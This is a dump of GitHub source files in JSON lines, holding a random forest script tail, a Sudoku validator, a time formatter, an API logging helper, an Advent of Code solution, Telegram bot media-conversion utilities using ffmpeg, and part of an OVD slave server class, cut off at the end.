cls_task)\n\ndf_feat_imp = pd.DataFrame({'Importance scores': feat_imp_scores,\n 'Species': species,\n 'Feature': feat_names})\ndf_feat_imp.sort_values(by='Species', inplace=True)\ndf_performance = pd.DataFrame(scores, columns=['Species', 'accuracy',\n 'task']).to_csv('../results/rand_for_perf.csv', index=False)\ndf_feat_imp.to_csv('../results/rand_for_feat_imp_SSR.csv', index=False)\n","repo_name":"NAMlab/DeepCRE","sub_path":"model/random_forest_ssr.py","file_name":"random_forest_ssr.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"9924500310","text":"'''program to check if a complete Sudoku grid is valid or not.\nDaniel M. Tamale\nTMLDAN001\n2014-05-16'''\n\n'''i and j are Sudoku rows and columns respectively''' \nstep=[]\nfor i in range(9):\n step.append([])\n list=input('')\n for j in range(9):\n step[-1].append(int(list[j:j+1]))\n\n'''Boolean value for validity of grid''' \nvalid=True\nfor i in range(9):\n grid=[0]*9\n for j in range(9):\n grid[step[i][j]-1]=1\n for k in range(9):\n if grid[k]==0:\n valid=False\n \nfor j in range(9):\n grid=[0]*9\n for i in range(9):\n grid[step[i][j]-1]=1\n for k in range(9):\n if grid[k]==0:\n valid=False\n\n'''variables row and col for larger Sudoku rows and columns respectively''' \nfor row in range(0,9,3):\n for col in range(0,9,3):\n grid=[0]*9\n for i in range(3):\n for j in range(3):\n grid[step[i+row][j+col]-1]=1\n for k in range(9):\n if grid[k]==0:\n valid=False\n \nif valid:\n print('Sudoku grid is valid')\nelse:\n print('Sudoku grid is not valid')","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_9/tmldan001/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70151987640","text":"def get_readable_time_from_seconds(seconds: int, granularity=2) -> str:\n intervals = (\n ('months', 2628000),\n ('days', 86400),\n ('hours', 3600),\n ('minutes', 60),\n ('seconds', 1),\n )\n result = []\n\n for name, count in intervals:\n value = seconds // count\n if value:\n seconds -= value * count\n if value == 1:\n name = name.rstrip('s')\n result.append(f\"{value} {name}\")\n return ', '.join(result[:granularity])\n\n\ndef get_percentage_from_float(value: float) -> str:\n return '{0:.2f} %'.format(value)\n","repo_name":"sahabpardaz/nemo","sub_path":"backend/apps/utils/formatter.py","file_name":"formatter.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"34662124975","text":"\"\"\"\n@Description:\n@Time: 2022/6/25 21:07\n\"\"\"\nimport json\nimport logging\nimport os\n\nimport requests\nimport yaml\nfrom requests import Response\n\nfrom constants import ROOT_PATH\nfrom utils_hep import lower_dict_keys\n\nlog = logging.getLogger(__name__)\n\nclass BaseApi:\n env = yaml.safe_load(open(os.path.join(ROOT_PATH, r'config/env.yaml')))\n\n def __init__(self):\n self.url = None\n self.method = None\n self.params = None\n self.headers = None\n\n def send(self):\n data = {\n \"url\": self.url,\n \"method\": self.method,\n \"params\": self.params,\n \"headers\": self.headers\n }\n data[\"url\"] = str(data[\"url\"]).replace(\"env_path\", self.env[self.env[\"default\"]])\n r = requests.request(method=data['method'],\n url=data['url'],\n headers=data['headers'])\n # print log\n get_req_resp_record(r)\n return r\n\n\ndef get_req_resp_record(resp_obj: Response):\n \"\"\" get request and response info from Response() object.\n \"\"\"\n\n def log_print(req_or_resp, r_type):\n msg = f\"\\n================== {r_type} details ==================\\n\"\n for key, value in req_or_resp.items():\n if isinstance(value, dict) or isinstance(value, list):\n value = json.dumps(value, indent=4, ensure_ascii=False)\n\n msg += \"{:<8} : {}\\n\".format(key, value)\n log.info(msg)\n\n request_headers = dict(resp_obj.request.headers)\n request_body = resp_obj.request.body\n\n if request_body is not None:\n try:\n request_body = json.loads(request_body)\n except json.JSONDecodeError:\n # str: a=1 & b=2\n pass\n except UnicodeDecodeError:\n # bytes/bytesarray: request body in protobuf\n pass\n except TypeError:\n # neither str or bytes/bytearray, eg. <MultipartEncoder>\n pass\n\n request_content_type = lower_dict_keys(request_headers).get(\"content-type\")\n if request_content_type and \"multipart/form-data\" in request_content_type:\n request_body = \"upload file stream (OMITTED)\"\n\n request_data = {\n \"method\": resp_obj.request.method,\n \"url\": resp_obj.request.url,\n \"headers\": request_headers,\n \"body\": request_body\n }\n\n log_print(request_data, \"request\")\n\n resp_headers = dict(resp_obj.headers)\n lower_resp_headers = lower_dict_keys(resp_headers)\n content_type = lower_resp_headers.get(\"content-type\", \"\")\n\n if \"image\" in content_type:\n # response is image type, record bytes content only\n response_body = resp_obj.content\n else:\n try:\n response_body = resp_obj.json()\n except ValueError:\n resp_text = resp_obj.text\n response_body = resp_text\n\n response_data = {\n \"status_code\": resp_obj.status_code,\n \"cookies\": resp_obj.cookies or {},\n \"encoding\": resp_obj.encoding,\n \"headers\": resp_headers,\n \"content_type\": content_type,\n \"body\": response_body\n }\n\n log_print(response_data, \"response\")","repo_name":"SanyaSS-beep/api_automation_wecom","sub_path":"api/base_api.py","file_name":"base_api.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70126546680","text":"from aoc_logging import logger\n\ndef part_one():\n print(\"--- Part One ---\")\n\n n_trees = 0\n\n x = 0\n\n width = None\n with open(\"map.txt\", 'r') as f:\n for line in f:\n line = line.strip()\n\n if width is None:\n width = len(line)\n else:\n if line[x] == \"#\":\n n_trees += 1\n\n x = (x+3) % width\n\n print(f\"I will encounter {n_trees} trees\")\n\n\ndef part_two():\n print(\"--- Part Two ---\")\n\n slopes = [\n [1, 1],\n [3, 1],\n [5, 1],\n [7, 1],\n [1, 2]\n ]\n\n n_trees = [0 for _ in slopes]\n\n xs = [0 for _ in slopes]\n\n width = None\n with open(\"map.txt\", 'r') as f:\n for i, line in enumerate(f):\n line = line.strip()\n\n for i_slope, (slope, x) in enumerate(zip(slopes, xs)):\n if width is None:\n width = len(line)\n if i % slope[1] == 0:\n if line[x] == \"#\":\n n_trees[i_slope] += 1\n\n xs[i_slope] = (x+slope[0]) % width\n\n print(n_trees)\n answer = 1\n for n in n_trees:\n answer *= n\n print(f\"Answer: {answer}\")\n\n\nif __name__ == '__main__':\n print(\"--- Day 3: Toboggan Trajectory ---\")\n part_one()\n part_two()","repo_name":"Yi-Jiahe/advent-of-code-2020","sub_path":"Day 3/day_3.py","file_name":"day_3.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21802259869","text":"import os\nimport logging\nimport subprocess\nimport requests\n\nimport ffmpy\n\nfrom pathlib import Path\n\nfrom moviepy.editor import *\n\nimport music_tag\nfrom telegram import ReplyKeyboardMarkup\nfrom telegram.ext import CallbackContext\n\nfrom models.admin import Admin\nfrom models.user import User\nfrom localization import keys\n\nlogger = logging.getLogger()\n\ndef translate_key_to(key: str, destination_lang: str) -> str:\n \"\"\"Find the specified key in the `keys` dictionary and returns the corresponding\n value for the given language\n\n **Keyword arguments:**\n - file_path (str) -- The file path of the file to delete\n\n **Returns:**\n - The value of the requested key in the dictionary\n \"\"\"\n if key not in keys:\n raise KeyError(\"Specified key doesn't exist\")\n\n return keys[key][destination_lang]\n\n\ndef delete_file(file_path: str) -> None:\n \"\"\"Deletes a file from the filesystem. Simply ignores the files that don't exist.\n\n **Keyword arguments:**\n - file_path (str) -- The file path of the file to delete\n \"\"\"\n if os.path.exists(file_path):\n os.remove(file_path)\n\n\ndef generate_music_info(tag_editor_context: dict) -> str:\n \"\"\"Generate the details of the music based on the values in `tag_editor_context`\n dictionary\n\n **Keyword arguments:**\n - tag_editor_context (dict) -- The context object of the user\n\n **Returns:**\n `str`\n \"\"\"\n ctx = tag_editor_context\n\n return (\n f\"*🗣 Artist:* {ctx['artist'] if ctx['artist'] else '-'}\\n\"\n f\"*🎵 Title:* {ctx['title'] if ctx['title'] else '-'}\\n\"\n f\"*🎼 Album:* {ctx['album'] if ctx['album'] else '-'}\\n\"\n f\"*🎹 Genre:* {ctx['genre'] if ctx['genre'] else '-'}\\n\"\n f\"*📅 Year:* {ctx['year'] if ctx['year'] else '-'}\\n\"\n f\"*💿 Disk Number:* {ctx['disknumber'] if ctx['disknumber'] else '-'}\\n\"\n f\"*▶️ Track Number:* {ctx['tracknumber'] if ctx['tracknumber'] else '-'}\\n\"\n \"{}\\n\"\n )\n\n\ndef increment_usage_counter_for_user(user_id: int) -> int:\n \"\"\"Increment the `number_of_files_sent` column of user with the specified `user_id`.\n\n **Keyword arguments:**\n - user_id (int) -- The user id of the user\n\n **Returns:**\n The new value for `user.number_of_files_sent`\n \"\"\"\n user = User.where('user_id', '=', user_id).first()\n\n if user:\n user.number_of_files_sent = user.number_of_files_sent + 1\n user.push()\n\n return user.number_of_files_sent\n\n raise LookupError(f'User with id {user_id} not found.')\n\ndef reset_user_data_context(context: CallbackContext) -> None:\n user_data = context.user_data\n language = user_data['language'] if ('language' in user_data) else 'en'\n\n if 'voice_path' in user_data:\n delete_file(user_data['voice_path'])\n if 'voice_art_path' in user_data:\n delete_file(user_data['voice_art_path'])\n if 'new_voice_art_path' in user_data:\n delete_file(user_data['new_voice_art_path'])\n if 'music_path' in user_data:\n delete_file(user_data['music_path'])\n if 'art_path' in user_data:\n delete_file(user_data['art_path'])\n if 'new_art_path' in user_data:\n delete_file(user_data['new_art_path'])\n if 'video_path' in user_data:\n delete_file(user_data['video_path'])\n if 'video_art_path' in user_data:\n delete_file(user_data['video_art_path'])\n if 'new_video_art_path' in user_data:\n delete_file(user_data['new_video_art_path'])\n if 'gif' in user_data:\n delete_file(user_data['gif'])\n\n new_user_data = {\n 'convert_video_to_gif': False,\n 'convert_video_to_circle': False,\n 'voice_path': '',\n 'voice_art_path': '',\n 'new_voice_art_path': '',\n 'video_path': '',\n 'video_art_path': '',\n 'new_video_art_path': '',\n 'gif': '',\n 'video_message_id': '',\n 'video_duration': '',\n 'tag_editor': {},\n 'music_path': '',\n 'music_duration': 0,\n 'art_path': '',\n 'new_art_path': '',\n 'current_active_module': '',\n 'music_message_id': 0,\n 'language': language,\n }\n context.user_data.update(new_user_data)\n\ndef create_user_directory(user_id: int) -> str:\n \"\"\"Create a directory for a user with a given id.\n\n **Keyword arguments:**\n - user_id (int) -- The user id of the user\n\n **Returns:**\n The path of the created directory\n \"\"\"\n user_download_dir = f\"downloads/{user_id}\"\n\n try:\n Path(user_download_dir).mkdir(parents=True, exist_ok=True)\n except (OSError, FileNotFoundError, BaseException) as error:\n raise Exception(f\"Can't create directory for user_id: {user_id}\") from error\n\n return user_download_dir\n\ndef download_file(user_id: int, file_to_download, file_type: str, context: CallbackContext) -> str:\n \"\"\"Download a file using convenience methods of \"python-telegram-bot\"\n\n **Keyword arguments:**\n - user_id (int) -- The user's id\n - file_to_download (*) -- The file object to download\n - file_type (str) -- The type of the file, either 'photo' or 'audio'\n - context (CallbackContext) -- The context object of the user\n\n **Returns:**\n The path of the downloaded file\n \"\"\"\n user_download_dir = f\"downloads/{user_id}\"\n file_id = ''\n file_extension = ''\n\n if file_type == 'audio':\n file_id = context.bot.get_file(file_to_download.file_id)\n file_name = file_to_download.file_name\n file_extension = file_name.split(\".\")[-1]\n elif file_type == 'photo':\n file_id = context.bot.get_file(file_to_download.file_id)\n file_extension = 'jpg'\n elif file_type == 'video':\n file_id = context.bot.get_file(file_to_download.file_id)\n file_name = file_to_download.file_name\n file_extension = file_name.split(\".\")[-1]\n elif file_type == 'voice':\n file_id = context.bot.get_file(file_to_download.file_id)\n mime_type = file_to_download.mime_type\n file_extension = mime_type.split(\"/\")[-1]\n\n # voice_path = voice_path.split(\"/\")[-1]\n\n # mime_type = voice_path.split(\".\")[-1]\n # voice = voice_path.split(\".\")[0]\n\n # # logger.error(voice_path)\n # new_voice = ffmpegcommand(file_id.file_id, file_extension)\n # os.system(new_voice)\n\n # logger.error(new_voice)\n # logger.error(file_id.file_id)\n\n file_download_path = f\"{user_download_dir}/{file_id.file_id}.{file_extension}\"\n\n try:\n file_id.download(f\"{user_download_dir}/{file_id.file_id}.{file_extension}\")\n except ValueError as error:\n raise Exception(f\"Couldn't download the file with file_id: {file_id}\") from error\n\n return file_download_path\n\ndef generate_start_over_keyboard(language: str) -> ReplyKeyboardMarkup:\n \"\"\"Create an return an instance of `start_over_keyboard`\n\n\n **Keyword arguments:**\n - language (str) -- The desired language to generate labels\n\n **Returns:**\n ReplyKeyboardMarkup instance\n \"\"\"\n return (\n ReplyKeyboardMarkup(\n [\n [translate_key_to('BTN_NEW_FILE', language)],\n ],\n resize_keyboard=True,\n one_time_keyboard=True,\n )\n )\n\n\ndef generate_module_selector_keyboard(language: str) -> ReplyKeyboardMarkup:\n \"\"\"Create an return an instance of `module_selector_keyboard`\n\n\n **Keyword arguments:**\n - language (str) -- The desired language to generate labels\n\n **Returns:**\n ReplyKeyboardMarkup instance\n \"\"\"\n return (\n ReplyKeyboardMarkup(\n [\n [\n translate_key_to('BTN_TAG_EDITOR', language),\n ],\n ],\n resize_keyboard=True,\n one_time_keyboard=True,\n )\n )\n\ndef generate_module_selector_video_keyboard(language: str) -> ReplyKeyboardMarkup:\n \"\"\"Create an return an instance of `module_selector_video_keyboard`\n\n\n **Keyword arguments:**\n - language (str) -- The desired language to generate labels\n\n **Returns:**\n ReplyKeyboardMarkup instance\n \"\"\"\n return (\n ReplyKeyboardMarkup(\n [\n [\n translate_key_to('BTN_CONVERT_VIDEO_TO_CIRCLE', language),\n translate_key_to('BTN_CONVERT_VIDEO_TO_GIF', language),\n ],\n ],\n resize_keyboard=True,\n one_time_keyboard=True,\n )\n )\n\ndef generate_module_selector_voice_keyboard(language: str) -> ReplyKeyboardMarkup:\n \"\"\"Create an return an instance of `module_selector_video_keyboard`\n\n\n **Keyword arguments:**\n - language (str) -- The desired language to generate labels\n\n **Returns:**\n ReplyKeyboardMarkup instance\n \"\"\"\n return (\n ReplyKeyboardMarkup(\n [\n [\n translate_key_to('BTN_CONVERT_VOICE_TO_AUDIO', language),\n ],\n ],\n resize_keyboard=True,\n one_time_keyboard=True,\n )\n )\n\ndef generate_tag_editor_keyboard(language: str) -> ReplyKeyboardMarkup:\n \"\"\"Create an return an instance of `tag_editor_keyboard`\n\n\n **Keyword arguments:**\n - language (str) -- The desired language to generate labels\n\n **Returns:**\n ReplyKeyboardMarkup instance\n \"\"\"\n return (\n ReplyKeyboardMarkup(\n [\n [\n translate_key_to('BTN_ALBUM_ART', language)\n ],\n ],\n resize_keyboard=True,\n )\n )\n\ndef generate_tag_editor_video_keyboard(language: str) -> ReplyKeyboardMarkup:\n \"\"\"Create an return an instance of `tag_editor_keyboard`\n\n\n **Keyword arguments:**\n - language (str) -- The desired language to generate labels\n\n **Returns:**\n ReplyKeyboardMarkup instance\n \"\"\"\n return (\n ReplyKeyboardMarkup(\n [\n [\n translate_key_to('BTN_CONVERT_VIDEO_TO_CIRCLE', language),\n translate_key_to('BTN_CONVERT_VIDEO_TO_GIF', language),\n ],\n ],\n resize_keyboard=True,\n )\n )\n\ndef save_tags_to_file(file: str, tags: dict, new_art_path: str) -> str:\n \"\"\"Create an return an instance of `tag_editor_keyboard`\n\n\n **Keyword arguments:**\n - file (str) -- The path of the file\n - tags (str) -- The dictionary containing the tags and their values\n - new_art_path (str) -- The new album art to set\n\n **Returns:**\n The path of the file\n \"\"\"\n music = music_tag.load_file(file)\n\n try:\n if new_art_path:\n with open(new_art_path, 'rb') as art:\n music['artwork'] = art.read()\n except OSError as error:\n raise Exception(\"Couldn't set hashtags\") from error\n\n music['artist'] = tags['artist'] if tags['artist'] else ''\n music['title'] = tags['title'] if tags['title'] else ''\n music['album'] = tags['album'] if tags['album'] else ''\n music['genre'] = tags['genre'] if tags['genre'] else ''\n music['year'] = int(tags['year']) if tags['year'] else 0\n music['disknumber'] = int(tags['disknumber']) if tags['disknumber'] else 0\n music['tracknumber'] = int(tags['tracknumber']) if tags['tracknumber'] else 0\n\n music.save()\n\n return file\n\ndef ffmpegcommand(voice, mime_type):\n # 1) wav to mp3\n # ffmpeg -i audio.wav -acodec libmp3lame audio.mp3\n\n # 2) ogg to mp3\n # ffmpeg -i audio.ogg -acodec libmp3lame audio.mp3\n\n # 3) ac3 to mp3\n # ffmpeg -i audio.ac3 -acodec libmp3lame audio.mp3\n\n # 4) aac to mp3\n # ffmpeg -i audio.aac -acodec libmp3lame audio.mp3\n\n new_mime_type = \"mp3\"\n # cmd = f'ffmpeg -i \"{voice}.{mime_type}\" -acodec libmp3lame \"{voice}.{new_mime_type}\"'\n # cmd = f'ffmpeg -i \"{inputt}\" -c copy \"{output}\"'\n cmd = f'ffmpeg -i \"{voice}.{mime_type}\" \"{voice}.{new_mime_type}\"'\n\n # ffmpeg -i input.mp3 -acodec libopus output.ogg -y\n # import os\n # import requests\n # import subprocess\n\n # token = YYYYYYY\n # chat_id = XXXXXXXX\n\n # upload_audio_url = \"https://api.telegram.org/bot%s/sendAudio?chat_id=%s\" % (token, chat_id)\n # audio_path_wav = '/Users/me/some-file.wav'\n\n # # Convert the file from wav to ogg\n # filename = os.path.splitext(audio_path_wav)[0]\n # audio_path_ogg = filename + '.ogg'\n # subprocess.run([\"ffmpeg\", '-i', audio_path_wav, '-acodec', 'libopus', audio_path_ogg, '-y'])\n\n # with open(audio_path_ogg, 'rb') as f:\n # data = f.read()\n\n # # An arbitrary .ogg filename has to be present so that the spectogram is shown\n # file = {'audio': ('Message.ogg', data)}\n # result = requests.post(upload_audio_url, files=file)\n # https://stackoverflow.com/questions/44615991/how-convert-ogg-file-to-telegram-voice-format\n # print(\"Command to be Executed is\")\n # print(cmd)\n return cmd\n\ndef myffmpegcommand(voice_path, user_data):\n voice = voice_path.split(\".\")[0]\n new_mime_type = \".mp3\"\n new_voice = voice + new_mime_type\n # subprocess.run([\"ffmpeg\", '-i', voice_path, '-acodec', 'libopus', new_voice, '-y'])\n # subprocess.run([\"ffmpeg -i {voice_path} -map 0:a -acodec libmp3lame {new_voice}\"])\n \n subprocess.run([\"ffmpeg\", \"-n\", \"-i\", voice_path, \"-acodec\", \"libmp3lame\", \"-ab\", \"128k\", new_voice])\n user_data['new_voice_art_path'] = new_voice\n # delete_file(user_data['voice_path'])\n # logging.info(user_data['new_voice_art_path'])\n # return\n # codec = \"libmp3lame\"\n # mp3_filename = filename + \".mp3\"\n\n # command = [self.FFMPEG_BIN,\n # \"-n\",\n # \"-i\", path,\n # \"-acodec\", codec,\n # \"-ab\", \"128k\",\n # mp3_filename\n # ]\n\n # old_voice = voice_path.split(\"/\")[-1]\n # voice_path = voice_path.split(\"/\")[0]\n # logger.error(voice_path)\n\n # mime_type = voice_path.split(\".\")[-1]\n # voice = voice_path.split(\".\")[0]\n\n\n\n # with open(new_voice, 'rb') as f:\n # data = f.read()\n\n # logging.error(new_voice)\n\n # An arbitrary .ogg filename has to be present so that the spectogram is shown\n # file = {'audio': ('Message.ogg', data)}\n # result = requests.post(upload_audio_url, files=file)\n # return result\n\ndef video_to_gif(video_path, user_data):\n video = video_path.split(\".\")[0]\n new_mime_type = \".gif\"\n gif = video + new_mime_type\n\n # logging.error(new_video)\n # subprocess.run([\"ffmpeg\", \"-i\", video_path, \"-pix_fmt\", \"rgb24\", gif])\n # subprocess.run([\"ffmpeg\", \"-i\", video_path, \"-movflags\", \"faststart\", \"-pix_fmt\", \"yuv420p\", \"-vf\", \"scale=trunc(iw/2)*2:trunc(ih/2)*2\", gif])\n subprocess.run([\"ffmpeg\", \"-ss\", \"00:00:00.000\", \"-i\", video_path, \"-pix_fmt\", \"rgb24\", \"-r\", \"10\", \"-s\", \"320x240\", \"-t\", \"00:00:10.000\", gif])\n user_data['gif'] = gif\n\n\n # subprocess([\"ffmpeg -f gif -i \" {video_path outfile.mp4}])\n # subprocess.run([\"ffmpeg\", \"-i\", video_path, \"-c:v\", \"libvpx\", \"-crf\", \"12\", \"-b:v\", \"500K\", gif])\n # subprocess.run([\"ffmpeg\", \"-f\", \"gif\", \"-i\", video_path, gif])\n # subprocess.run([\"ffmpeg\", \"-i\", video_path, \"-movflags\", \"faststart\", \"-pix_fmt\", \"yuv420p\", \"-vf\", \"scale=trunc(iw/2)*2:trunc(ih/2)*2\", gif])\n # subprocess.run([\"ffmpeg\", \"-ss\", \"00:01:30\", \"-t\", \"5\", \"-i\", video_path, \"-filter_complex\", \"[0:v] fps=10,scale=720:-1 [new];[new][1:v] paletteuse\", gif])\n # subprocess.run([\"ffmpeg\", \"-stream_loop 5\", \"-i\", video_path, \"-y;ffmpeg\", \"-i\" loop.gif -pix_fmt yuv420p -vf \"scale=trunc(iw/2)*2:trunc(ih/2)*2\" loop.mp4 -y\"])\n # try:\n # with open(video_path, 'rb') as video_file:\n # clip = (VideoFileClip(video_file)\n # .subclip((1,22.65),(1,23.2))\n # .resize(0.3))\n # clip.write_gif(new_video)\n\n # except (BaseException) as error:\n # logger.exception(\"Telegram error: %s\", error)\n\n # subprocess.run([\"ffmpeg -ss 30 -t 3 -i\", video_path, \"-vf\", \"fps=10,scale=320:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse\", \"-loop 0\", new_video])\n # subprocess.run([\"ffmpeg -i\", video_path, \"-vf scale=320:-1 -r 10 -f image2pipe -vcodec ppm - | convert -delay 10 -loop 0 - gif:- | convert -layers Optimize - \", new_video])\n\n # subprocess.run([video_path, new_video])","repo_name":"ahmadkybora/bt_21","sub_path":"utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":16241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5422042931","text":"import os\nimport time\nimport sys\nfrom xml.dom.minidom import Document\n\nfrom ovd.Config import Config\nfrom ovd.Exceptions import InterruptedException\nfrom ovd.Logger import Logger\nfrom ovd.Platform.System import System\n\nfrom Dialog import Dialog\nfrom SMRequestManager import SMRequestManager\n\n\nclass SlaveServer:\n\tdef __init__(self, CommunicationClass):\n\t\tLogger.debug(\"SlaveServer construct\")\n\t\t\n\t\tself.stopped = False\n\t\t\n\t\tself.role_dialogs = []\n\t\tself.monitoring = None\n\t\tself.time_last_send_monitoring = 0\n\t\t\n\t\tself.ulteo_system = False\n\t\tif os.path.isfile(\"/usr/bin/apt-get\"):\n\t\t\tself.ulteo_system = True\n\t\t\n\t\t\n\t\tself.dialog = Dialog(self)\n\t\tself.smRequestManager = SMRequestManager()\n\t\t\n\t\tself.communication = CommunicationClass()\n\t\tself.communication.dialogInterfaces.append(self.dialog)\n\t\n\t\n\tdef load_roles(self):\n\t\tfor role in Config.roles:\n\t\t\ttry:\n\t\t\t\tRole = __import__(\"ovd.Role.%s.Role\" %(role), {}, {}, \"Role\")\n\t\t\t\tRoleDialog = __import__(\"ovd.Role.%s.Dialog\"%(role), {}, {}, \"Dialog\")\n\t\t\t\tRoleConfig = __import__(\"ovd.Role.%s.Config\"%(role), {}, {}, \"Config\")\n\t\t\t\n\t\t\texcept ImportError:\n\t\t\t\tLogger.error(\"Unsupported role '%s'\"%(role))\n\t\t\t\timport traceback\n\t\t\t\tLogger.debug(traceback.format_exc())\n\t\t\t\treturn False\n\t\t\t\n\t\t\tif not RoleConfig.Config.init(Config.get_role_dict(role)):\n\t\t\t\tLogger.error(\"Unable to init configuration for role '%s'\"%(role))\n\t\t\t\treturn False\n\t\t\t\n\t\t\tRoleConfig.Config.general = Config\n\t\t\t\n\t\t\trole_instance = Role.Role(self)\n\t\t\tdialog_instance = RoleDialog.Dialog(role_instance)\n\t\t\t\n\t\t\tself.communication.dialogInterfaces.append(dialog_instance)\n\t\t\tself.role_dialogs.append((role_instance, dialog_instance))\n\t\t\n\t\treturn True\n\t\n\t\n\tdef init(self):\n\t\tLogger.debug(\"SlaveServer init\")\n\t\t\n\t\tif not self.communication.initialize():\n\t\t\treturn False\n\t\t\n\t\tself.communication.thread.start()\n\t\t\n\t\tfor (role, dialog) in self.role_dialogs:\n\t\t\ttry:\n\t\t\t\tif not role.init():\n\t\t\t\t\traise Exception()\n\t\t\texcept InterruptedException:\n\t\t\t\treturn False\n\t\t\texcept Exception:\n\t\t\t\tLogger.exception(\"SlaveServer: unable to initialize role '%s'\"%role.getName())\n\t\t\t\treturn False\n\t\t\t\n\t\t\trole.thread.start()\n\t\t\n\t\t# Check each thread has started correctly (communication + roles)\n\t\tt0 = time.time()\n\t\twhile self.communication.getStatus() is not self.communication.STATUS_RUNNING:\n\t\t\tt1 = time.time()\n\t\t\t\n\t\t\tif (t1-t0 > 20) or (not self.communication.thread.isAlive()) or self.communication.getStatus() is self.communication.STATUS_ERROR:\n\t\t\t\tLogger.warn(\"SlaveServer::init communication thread error\")\n\t\t\t\treturn False\n\t\t\t\n\t\t\tLogger.info(\"Waiting for communication status running\")\n\t\t\ttime.sleep(1)\n\t\tfor (role, dialog) in self.role_dialogs:\n\t\t\twhile role.getStatus() is not role.STATUS_RUNNING:\n\t\t\t\tt1 = time.time()\n\t\t\t\t\n\t\t\t\tif (t1-t0 > 20) or (not role.thread.isAlive()) or role.getStatus() is role.STATUS_ERROR:\n\t\t\t\t\tLogger.warn(\"SlaveServer::init role %s error\"%(role.getName()))\n\t\t\t\t\treturn False\n\t\t\t\t\n\t\t\t\tLogger.info(\"Waiting for role %s status running\"%(role.getName()))\n\t\t\t\ttime.sleep(1)\n\t\t\n\t\tself.updateMonitoring()\n\t\treturn True\n\t\n\t\n\tdef push_production(self):\n\t\ttry:\n\t\t\tself.smRequestManager.initialize()\n\t\texcept Exception:\n\t\t\tLogger.exception(\"smRequestManager initialize returned\")\n\t\t\treturn False\n\t\t\n\t\tif not self.smRequestManager.switch_status(self.smRequestManager.STATUS_READY):\n\t\t\tLogger.warn(\"SlaveServer::loop unable to send status ready\")\n\t\t\treturn False\n\t\t\n\t\tfor (role, dialog) in self.role_dialogs:\n\t\t\trole.switch_to_production()\n\t\t\n\t\treturn True\n\t\n\t\n\tdef loop_procedure(self):\n\t\tfor role_dialog in list(self.role_dialogs):\n\t\t\trole = role_dialog[0]\n\t\t\tif not role.thread.isAlive():\n\t\t\t\tLogger.warn(\"Thread '%s' stopped\" % role.thread.getName())\n\t\t\t\tself.role_dialogs.remove(role_dialog)\n\t\t\n\t\tself.updateMonitoring()\n\t\t\n\t\tt1 = time.time()\n\t\tif t1-self.time_last_send_monitoring > 30:\n\t\t\tself.time_last_send_monitoring = t1\n\t\t\t\n\t\t\tdoc = self.getMonitoring()\n\t\t\tself.smRequestManager.send_server_monitoring(doc)\n\t\t\t\n\t\t\tself.time_last_send_monitoring = time.time()\n\t\n\t\n\tdef stop(self, Signum=None, Frame=None):\n\t\tLogger.info(\"SlaveServer stop\")\n\t\tself.stopped = True\n\t\t\n\t\tt0 = time.time()\n\t\tstop_timeout = Config.stop_timeout\n\t\t\n\t\tfor (role, dialog) in self.role_dialogs:\n\t\t\trole.order_stop()\n\t\t\t\n\t\tself.smRequestManager.switch_status(self.smRequestManager.STATUS_PENDING)\n\t\t\t\n\t\tfor (role, dialog) in self.role_dialogs:\n\t\t\twhile not role.stopped():\n\t\t\t\tt1 = time.time()\n\t\t\t\t\n\t\t\t\tif (stop_timeout > 0) and (t1-t0 > stop_timeout):\n\t\t\t\t\tLogger.warn(\"SlaveServer::stop role %s error\"%(role.getName()))\n\t\t\t\t\trole.force_stop()\n\t\t\t\t\tbreak\n\t\t\t\t\n\t\t\t\tLogger.debug(\"Waiting for role %s status stop\"%(role.getName()))\n\t\t\t\ttime.sleep(2)\n\t\t\n\t\tfor (role, dialog) in self.role_dialogs:\n\t\t\tif role.thread.isAlive():\n\t\t\t\tLogger.debug(\"Waiting %s will stop\" % role.getName())\n\t\t\t\trole.thread.join(10)\n\t\t\t\tif role.thread.isAlive():\n\t\t\t\t\tLogger.error(\"Role %s was stopped by using low force\" % role.getName())\n\t\t\t\t\trole.thread._Thread__stop()\n\t\t\t\t\trole.thread.join(5)\n\t\t\t\t\tif role.thread.isAlive():\n\t\t\t\t\t\tLogger.error(\"Role %s was stopped by using force\" % role.getName())\n\t\t\t\t\t\trole.thread._Thread__delete()\n\t\t\trole.finalize()\n\t\t\t\n\t\t\tLogger.info(\"Role %s stopped\" % role.getName())\n\t\t\n\t\tself.communication.stop()\n\t\tif self.communication.thread.isAlive():\n\t\t\tself.communication.thread.join()\n\t\t\n\t\tself.smRequestManager.switch_status(self.smRequestManager.STATUS_DOWN)\n\t\n\t\n\tdef getMonitoring(self):\n\t\trootNode = self.monitoring.cloneNode(True)\n\t\trootNode.setAttribute(\"name\", self.smRequestManager.name)\n\t\t\n\t\tdoc = Document()\n\t\tfor (role, dialog) in self.role_dialogs:\n\t\t\tnode = doc.createElement(\"role\")\n\t\t\t\n\t\t\trole.getReporting(node)\n\t\t\tnode.setAttribute(\"name\", role.getName())\n\t\t\trootNode.appendChild(node)\n\t\t \n\t\tdoc.appendChild(rootNode)\n\t\treturn doc\n\t\n\t\n\tdef updateMonitoring(self):\n\t\tcpu_load = System.getCPULoad()\n\t\tram_used = System.getRAMUsed()\n\t\t\n\t\tdoc = Document()\n\t\tmonitoring = doc.createElement('server')\n\t\t\n\t\tcpu = doc.createElement('cpu')\n\t\tcpu.setAttribute('load', str(cpu_load))\n\t\t\n\t\tmonitoring.appendChild(cpu)\n\t\t\n\t\tram = doc.createElement('ram')\n\t\tram.setAttribute('used', str(ram_used))\n\t\tmonitoring.appendChild(ram)\n\t\t\n\t\tself.monitoring = 